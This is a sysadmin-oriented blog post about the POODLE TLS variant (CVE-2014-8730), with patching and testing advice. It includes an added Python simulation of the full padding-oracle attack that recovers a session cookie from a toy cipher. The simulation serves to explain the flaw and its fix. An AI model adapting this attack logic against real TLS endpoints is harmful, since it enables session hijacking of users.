Photo by Karin Jonsson (Flickr: Poodle) [CC-BY-2.0], via Wikimedia Commons
POODLE 2.0: Here We Go Again
It was just a bit more than a month ago that the original POODLE vulnerability in SSLv3 (CVE-2014-3566) was disclosed and sent sysadmins around the world scrambling.
You might remember that the original POODLE vulnerability affected SSLv3, an older protocol that has largely been replaced by TLS. Since many systems only kept SSLv3 enabled to support very old web browsers, it was no big deal to disable it and thereby remove the vulnerability.
But today news is spreading that some TLS implementations are vulnerable to the same attack, and that as many as 10% of all web sites may be affected. The new vulnerability has been labeled CVE-2014-8730, and it is more serious than the original POODLE: the flaw lies in how the affected TLS stacks check CBC padding, so the attacker does not need to downgrade the connection to SSLv3, and having SSLv3 disabled does not protect you.
It’s time to scramble again.
In practical terms this means that when you are logged into a secure web site, an attacker who can sit between you and the site and get your browser to send a series of requests can decrypt your session cookie one byte at a time (on average 256 requests per byte) and then use that cookie to take over your session.
For sysadmins this means it is important to patch now to protect your corporate sites. F5 Networks has already reported that some of its load balancers are vulnerable and has a patch available. Load balancers from A10 Networks are vulnerable too, and a patch is expected from them later today. Update: A10 patches can be found here: http://www.a10networks.com/support/security_advisories.php
Monitoring for POODLE 2.0
We are waiting on details from Microsoft to see whether IIS is affected; so far all signs look good. Qualys has an online test (the SSL Labs server test) that checks for many different vulnerabilities, including this new one. We tested all of our outward-facing Windows boxes and got a passing grade on all of them. We recommend that you do the same as soon as possible, and that you test every public hostname rather than the servers alone: the flaw sits in whatever terminates TLS, so a patched web server behind a vulnerable load balancer still fails.
One Last Thing
Why the name POODLE? It may seem strange to name a serious security issue after a popular dog breed, but POODLE is actually an acronym for “Padding Oracle On Downgraded Legacy Encryption.” “Oracle” here has nothing to do with the company; in cryptography an oracle is anything that answers a question the attacker could not answer alone. In this attack the oracle is the server itself: by watching whether it accepts or rejects a deliberately tampered record, the attacker learns one byte of the plaintext at a time. The “Downgraded Legacy Encryption” part refers to forcing the browser down to SSLv3, which the original attack needed and the TLS variant does not.
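To make the cookie-stealing scenario above and the padding-oracle term concrete, here is an added simulation (not code from the original post, and not any vendor's implementation). It models a CBC record layer whose receiver reads the padding-length byte but never checks the filler bytes, which is the SSLv3 behaviour and the defect in the TLS stacks affected by CVE-2014-8730, and runs the POODLE attack against it, then against a receiver that checks every padding byte. The block cipher is a toy 4-round Feistel network over SHA-256 so the script needs no third-party packages; the session cookie, request layout and key are constructed values.

```python
"""POODLE padding-oracle simulation. Added example, not code from the original
post. Toy Feistel block cipher over SHA-256 stands in for AES; the attack logic
is cipher-independent."""
import hashlib
import hmac
import os

BLOCK = 16     # cipher block size
MAC_LEN = 16   # truncated HMAC-SHA256, MAC-then-encrypt as in SSL/TLS CBC suites
SECRET = b"sid=9f3a7c1e"  # constructed session cookie the attacker is after


def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def _f(key, rnd, half):  # toy round function: keyed SHA-256 cut to half a block
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:BLOCK // 2]

def encrypt_block(key, block):
    l, r = block[:BLOCK // 2], block[BLOCK // 2:]
    for rnd in range(4):
        l, r = r, _xor(l, _f(key, rnd, r))
    return l + r

def decrypt_block(key, block):
    l, r = block[:BLOCK // 2], block[BLOCK // 2:]
    for rnd in reversed(range(4)):
        l, r = _xor(r, _f(key, rnd, l)), l
    return l + r

def cbc_encrypt(key, iv, data):
    out, prev = [], iv
    for i in range(0, len(data), BLOCK):
        prev = encrypt_block(key, _xor(data[i:i + BLOCK], prev))
        out.append(prev)
    return b"".join(out)

def cbc_decrypt(key, iv, data):
    out, prev = [], iv
    for i in range(0, len(data), BLOCK):
        out.append(_xor(decrypt_block(key, data[i:i + BLOCK]), prev))
        prev = data[i:i + BLOCK]
    return b"".join(out)

def mac(key, data):
    return hmac.new(key, data, hashlib.sha256).digest()[:MAC_LEN]

def seal_record(key, payload):
    """Client: payload || MAC || padding (pad_len filler bytes, then the length byte), fresh IV."""
    body = payload + mac(key, payload)
    pad_len = BLOCK - 1 - len(body) % BLOCK
    body += bytes([pad_len]) * pad_len + bytes([pad_len])
    iv = os.urandom(BLOCK)
    return iv + cbc_encrypt(key, iv, body)

def open_record(key, record, check_padding_bytes):
    """Server: True if accepted. check_padding_bytes=False is the vulnerable behaviour."""
    iv, body = record[:BLOCK], record[BLOCK:]
    if not body or len(body) % BLOCK:
        return False
    plain = cbc_decrypt(key, iv, body)
    pad_len = plain[-1]
    if pad_len + 1 + MAC_LEN > len(plain):
        return False
    if check_padding_bytes and plain[-1 - pad_len:-1] != bytes([pad_len]) * pad_len:
        return False   # the TLS fix: every filler byte must equal the length byte
    payload, tag = plain[:-1 - pad_len - MAC_LEN], plain[-1 - pad_len - MAC_LEN:-1 - pad_len]
    return hmac.compare_digest(tag, mac(key, payload))

def victim_request(key, prefix_len, suffix_len):
    """Victim browser driven by attacker script: path and body lengths are attacker-chosen,
    the cookie is added by the browser. Every call is a fresh record."""
    return seal_record(key, b"/" * prefix_len + b"Cookie: " + SECRET + b"B" * suffix_len)

def poodle_recover(key, check_padding_bytes, max_tries=20000):
    """Man-in-the-middle. `key` is only passed through to the simulated browser and server."""
    recovered = bytearray()
    for j in range(len(SECRET)):
        # Put cookie byte j last in its block; end the record with a full padding block.
        prefix_len = (BLOCK - 1 - 8 - j) % BLOCK
        t = (prefix_len + 8 + j) // BLOCK              # data block holding the target byte
        suffix_len = -(prefix_len + 8 + len(SECRET)) % BLOCK
        for _ in range(max_tries):
            rec = victim_request(key, prefix_len, suffix_len)
            blocks = [rec[i:i + BLOCK] for i in range(0, len(rec), BLOCK)]  # blocks[0] = IV
            # Swap the final (padding) block for the ciphertext block holding the target.
            forged = b"".join(blocks[:-1]) + blocks[t + 1]
            if open_record(key, forged, check_padding_bytes):
                # Accepted => D(C_target)[-1] ^ C_{n-1}[-1] == BLOCK-1; plaintext byte = D(C_target)[-1] ^ C_t[-1]
                recovered.append((BLOCK - 1) ^ blocks[-2][-1] ^ blocks[t][-1])
                break
        else:
            return None   # the oracle never fired within the budget
    return bytes(recovered)

def run_attack(check_padding_bytes, max_tries=20000):
    key = os.urandom(16)   # session key known to browser and server only
    return poodle_recover(key, check_padding_bytes, max_tries)
```

Against the lenient receiver `run_attack(False)` returns the full cookie after roughly 256 requests per byte, which is why the attacker needs to keep the victim's browser re-sending the request; against the strict receiver the forged record is accepted only if all sixteen bytes of the decrypted padding block happen to equal 15, so `run_attack(True)` exhausts its budget and returns None. Real TLS stacks that were fixed for this bug made exactly the `check_padding_bytes=True` change.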
Thanks for Reading!
We develop server monitoring software that helps sysadmins make sure their critical IT systems are running 24×7. If you’re looking for a professional monitoring solution, download our free 30-day edition and see for yourself why our monitoring technology is the best that is out there.